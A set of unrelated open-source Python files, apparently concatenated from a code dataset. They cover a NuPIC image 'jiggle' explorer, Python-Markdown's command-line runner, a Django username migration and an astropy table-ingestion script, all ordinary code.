# reflect the current release candidate ('rc0', 'rc1') or, finally, the official
# stable release (indicated by `_VERSION_SUFFIX = ''`). Outside the context of a
# release branch, the current version is by default assumed to be a
# 'development' version, labeled 'dev'.
_VERSION_SUFFIX = 'dev'
# Example, '0.4.0-dev'
__version__ = '.'.join([
_MAJOR_VERSION,
_MINOR_VERSION,
_PATCH_VERSION,
])
if _VERSION_SUFFIX:
__version__ = '{}-{}'.format(__version__, _VERSION_SUFFIX)
|
Lyleo/nupic
|
refs/heads/master
|
nupic/regions/ImageSensorExplorers/Jiggle.py
|
8
|
# ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
from nupic.regions.ImageSensorExplorers.SpiralSweep import SpiralSweep
DEBUG = 0
class Jiggle(SpiralSweep):
"""
This explorer jiggles the image around each possible location within a specified
radius, being careful not to repeat movements already performed between any
two locations for maximum efficiency.
This explorer can be an efficient means of training a first order temporal
learner for translation shifts within a certain radius from center.
"""
def __init__(self, shift=1, radius=1, *args, **kwargs):
"""
@param shift -- Number of pixels to shift each time.
@param radius -- maximum amount to move away from center. Must be a multiple
of 'shift'
"""
assert(radius >= 1)
SpiralSweep.__init__(self, radius, *args, **kwargs)
if (radius % shift) != 0:
raise RuntimeError("radius must be a multiple of shift")
# Generate the location offsets that we will move to for each image
self.offsets = self._generateOffsets(shift, radius)
self.index = 0
def _generateOffsets(self, shift, radius):
"""
Generate the list of offsets we will visit for each image/filter combination
@param shift - how much each location is separated by
@param radius - maximum radius away from center to move
"""
# Table mapping a jiggle index to the relative location
gJiggleOffsets = [ \
# direction jiggleIndex's
( 0, shift), # up (1,2)
(-shift, shift), # up-right (3,4)
(-shift, 0), # right (5,6)
(-shift,-shift), # down-right (7,8)
( 0, -shift), # down (9,10)
( shift,-shift), # down-left (11,12)
( shift, 0), # left (13,14)
( shift, shift), # up-left (15,16)
]
gJigglesPerformed = []
# ------------------------------------------------------------------------
# Find the next "jiggle" for the current offset
def nextJiggle(location, jiggleIndex, jiggleOffsets, jigglesPerformed):
"""
Find the next jiggle around the current location
@param location - current location
@param jiggleIndex - current jiggle index
@param jiggleOffsets - table of jiggle offsets for each location
@param jigglesPerformed - which jiggles we've performed already between
all possible locations
@retval (jiggleIndex, jiggleTo)
or None if we've already visited all neighbors from this location
"""
#global jigglesPerformed, jiggleOffsets
while True:
jiggleIndex += 1
if jiggleIndex > 16:
return (None, None)
src = tuple(location)
dst = (src[0] + jiggleOffsets[(jiggleIndex-1)/2][0],
src[1] + jiggleOffsets[(jiggleIndex-1)/2][1])
# If the dst is outside our radius, skip it
if max(abs(dst[0]), abs(dst[1])) > radius:
continue
# Going away or coming back?
if (jiggleIndex & 1) == 0:
(src, dst) = (dst, src)
# If we've already peformed this transition between src and dst, skip it
if (jiggleIndex & 1):
awayJiggle = (src, dst)
backJiggle = (dst, src)
if awayJiggle in jigglesPerformed and \
backJiggle in jigglesPerformed:
if DEBUG >= 2: print "already performed jiggle", jiggleIndex, ", skipping"
jiggleIndex += 1
continue
# Add these jiggles to those performed
jigglesPerformed += [awayJiggle, backJiggle]
# Move to dst
if DEBUG >= 2:
print "jiggleIndex:", jiggleIndex, "location:", location,
print "relPosition:", dst
return (jiggleIndex, dst)
# --------------------------------------------------------------------------
# Loop through each loation within the radius and find all the jiggles
# Locations are encoded (x, y) and higher values move towards the top-left
location = [radius, radius] # top-left corner
offsets = [tuple(location)]
while True:
jiggleIndex = 0
# ...............................
# Next jiggle at this location
while True:
(jiggleIndex, offset) = nextJiggle(location, jiggleIndex, gJiggleOffsets,
gJigglesPerformed)
if offset is None:
break
offsets += [offset]
# ...............................
# Next location
# Next location to the right
location[0] -= shift
if location[0] >= -radius:
offsets += [tuple(location)]
continue
# Next row down, on the left
location[0] = radius
location[1] -= shift
if location[1] >= -radius:
offsets += [tuple(location)]
continue
# Exhausted all locations, break out
break
return offsets
|
ltilve/ChromiumGStreamerBackend
|
refs/heads/master
|
third_party/markdown/__main__.py
|
109
|
# markdown is released under the BSD license
# Copyright 2007, 2008 The Python Markdown Project (v. 1.7 and later)
# Copyright 2004, 2005, 2006 Yuri Takhteyev (v. 0.2-1.6b)
# Copyright 2004 Manfred Stienstra (the original version)
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE PYTHON MARKDOWN PROJECT ''AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL ANY CONTRIBUTORS TO THE PYTHON MARKDOWN PROJECT
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
COMMAND-LINE SPECIFIC STUFF
=============================================================================
"""
import markdown
import sys
import optparse
import logging
from logging import DEBUG, INFO, CRITICAL
logger = logging.getLogger('MARKDOWN')
def parse_options():
"""
Define and parse `optparse` options for command-line usage.
"""
usage = """%prog [options] [INPUTFILE]
(STDIN is assumed if no INPUTFILE is given)"""
desc = "A Python implementation of John Gruber's Markdown. " \
"http://packages.python.org/Markdown/"
ver = "%%prog %s" % markdown.version
parser = optparse.OptionParser(usage=usage, description=desc, version=ver)
parser.add_option("-f", "--file", dest="filename", default=None,
help="Write output to OUTPUT_FILE. Defaults to STDOUT.",
metavar="OUTPUT_FILE")
parser.add_option("-e", "--encoding", dest="encoding",
help="Encoding for input and output files.",)
parser.add_option("-q", "--quiet", default = CRITICAL,
action="store_const", const=CRITICAL+10, dest="verbose",
help="Suppress all warnings.")
parser.add_option("-v", "--verbose",
action="store_const", const=INFO, dest="verbose",
help="Print all warnings.")
parser.add_option("-s", "--safe", dest="safe", default=False,
metavar="SAFE_MODE",
help="'replace', 'remove' or 'escape' HTML tags in input")
parser.add_option("-o", "--output_format", dest="output_format",
default='xhtml1', metavar="OUTPUT_FORMAT",
help="'xhtml1' (default), 'html4' or 'html5'.")
parser.add_option("--noisy",
action="store_const", const=DEBUG, dest="verbose",
help="Print debug messages.")
parser.add_option("-x", "--extension", action="append", dest="extensions",
help = "Load extension EXTENSION.", metavar="EXTENSION")
parser.add_option("-n", "--no_lazy_ol", dest="lazy_ol",
action='store_false', default=True,
help="Observe number of first item of ordered lists.")
(options, args) = parser.parse_args()
if len(args) == 0:
input_file = None
else:
input_file = args[0]
if not options.extensions:
options.extensions = []
return {'input': input_file,
'output': options.filename,
'safe_mode': options.safe,
'extensions': options.extensions,
'encoding': options.encoding,
'output_format': options.output_format,
'lazy_ol': options.lazy_ol}, options.verbose
def run():
"""Run Markdown from the command line."""
# Parse options and adjust logging level if necessary
options, logging_level = parse_options()
if not options: sys.exit(2)
logger.setLevel(logging_level)
logger.addHandler(logging.StreamHandler())
# Run
markdown.markdownFromFile(**options)
if __name__ == '__main__':
# Support running module as a commandline command.
# Python 2.5 & 2.6 do: `python -m markdown.__main__ [options] [args]`.
# Python 2.7 & 3.x do: `python -m markdown [options] [args]`.
run()
|
watchdogpolska/bliski_publikator
|
refs/heads/master
|
bliski_publikator/users/migrations/0002_auto_20160414_0903.py
|
1
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.5 on 2016-04-14 09:03
from __future__ import unicode_literals
import django.core.validators
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('users', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='user',
name='username',
field=models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 30 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=30, unique=True, validators=[django.core.validators.RegexValidator('^[\\w.@+-]+$', 'Enter a valid username. This value may contain only letters, numbers and @/./+/-/_ characters.')], verbose_name='username'),
),
]
|
adamginsburg/frontend
|
refs/heads/master
|
ingest_datasets_better.py
|
3
|
import numpy as np
from astropy import table
from astropy.table import Table,Column
from astropy import units as u
import re
import string
unit_mapping = {'SurfaceDensity':u.M_sun/u.pc**2,
'VelocityDispersion':u.km/u.s,
'Radius':u.pc}
def fix_logical(t):
"""
Convert a boolean column from string to boolean
"""
newcols = []
for col in t.columns.values():
if col.dtype.str.endswith('S5') or col.dtype.str.endswith('S4'):
falses = col == 'False'
trues = col == 'True'
if np.all(falses | trues):
col = t.ColumnClass(trues, name=col.name)
newcols.append(col)
return Table(newcols)
def reorder_columns(tbl, order):
"""
Sort the columns into an order set by the order list
"""
cols = [tbl[colname] for colname in order]
return Table(cols)
def rename_columns(tbl, mapping = {'name':'Names', 'id':'IDs',
'surfdens':'SurfaceDensity',
'vdisp':'VelocityDispersion',
'radius':'Radius','is_sim':'IsSimulated'},
remove_column='Ignore'):
"""
Rename table columns inplace
"""
for k,v in mapping.items():
if k in tbl.colnames:
if v == remove_column:
tbl.remove_column(k)
elif k != v:
tbl.rename_column(k,v)
def fix_bad_colnames(tbl):
"""
Remove bad characters in column names
"""
badchars = re.compile("[^A-Za-z0-9_]")
for k in tbl.colnames:
if badchars.search(k):
tbl.rename_column(k, badchars.sub("", k))
print("Renamed {0} to {1}".format(k, badchars.sub("", k)))
def fix_bad_types(tbl):
"""
For all columns that *can* be converted to float, convert them to float
"""
columns = []
for columnname, column in tbl.columns.items():
try:
col = Column(data=column.astype('float'), name=column.name)
columns.append(col)
except:
columns.append(column)
return Table(columns)
def set_units(tbl, units=unit_mapping):
"""
Set the units of the table to the specified units.
WARNING: this *overwrites* existing units, it does not convert them!
"""
for k,v in units.items():
if k not in tbl.colnames:
raise KeyError("{0} not in table: run `rename_columns` first.".format(k))
#DEBUG print 'BEFORE unit for',k,":",tbl[k].unit
if v:
# only set units if there is a unit to be specified
tbl[k].unit = v
#DEBUG print 'AFTER unit for',k,":",tbl[k].unit
def convert_units(tbl, units=unit_mapping):
"""
Convert from the units used in the table to the specified units.
"""
for k,v in units.items():
if k not in tbl.colnames:
raise KeyError("{0} not in table: run `rename_columns` first.".format(k))
tbl[k] = tbl[k].to(v)
tbl[k].unit = v
def add_name_column(tbl, name):
"""
Add the person's name as a column
"""
tbl.add_column(table.Column(name='Names', data=[name]*len(tbl)), index=0)
def add_filename_column(tbl, filename):
"""
Add the filename as a column
"""
tbl.add_column(table.Column(name='Filename', data=[filename]*len(tbl)))
def add_timestamp_column(tbl, timestamp):
"""
Add the current date and time as a column
"""
tbl.add_column(table.Column(name='Timestamp', data=[timestamp]*len(tbl)))
def add_is_gal_column(tbl, is_gal):
"""
Add IsGalactic column
"""
tbl.add_column(table.Column(name='IsGalactic', data=[is_gal]*len(tbl)))
def append_table(merged_table, table_to_add):
"""
Append a new table to the original
"""
for row in table_to_add:
merged_table.add_row(row)
def add_generic_ids_if_needed(tbl):
"""
Add numbered IDs if no IDs column is provided
"""
if 'IDs' not in tbl.colnames:
tbl.add_column(table.Column(data=np.arange(len(tbl)), name='IDs'))
def add_is_sim_if_needed(tbl, is_sim=True):
"""
Add is_sim if no is_sim column is provided
"""
if 'IsSimulated' not in tbl.colnames:
tbl.add_column(table.Column(data=[is_sim]*(len(tbl)), name='IsSimulated'))
def add_is_gal_if_needed(tbl, is_gal=True):
"""
Add is_gal if no is_gal column is provided
"""
if 'IsGalactic' not in tbl.colnames:
tbl.add_column(table.Column(data=[is_gal]*(len(tbl)), name='IsGalactic'))
def ignore_duplicates(table, duplicates):
"""
If entries in upload data duplicate entries already in table, ignore them.
Needs list of duplicates, which is constructed elsewhere.
"""
to_delete = []
for row in table:
name = row['Names']
id = row['IDs']
if id in duplicates:
if duplicates[id] == name:
to_delete.append(row.index)
table.remove_rows(to_delete)
def update_duplicates(merged_table, duplicates):
"""
If entries in upload data duplicate entries already in table, remove
the versions already in the table. Needs list of duplicates, which is
constructed elsewhere.
"""
to_delete = []
for row in merged_table:
name = row['Names']
id = row['IDs']
if id in duplicates:
if duplicates[id] == name:
to_delete.append(row.index)
merged_table.remove_rows(to_delete)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.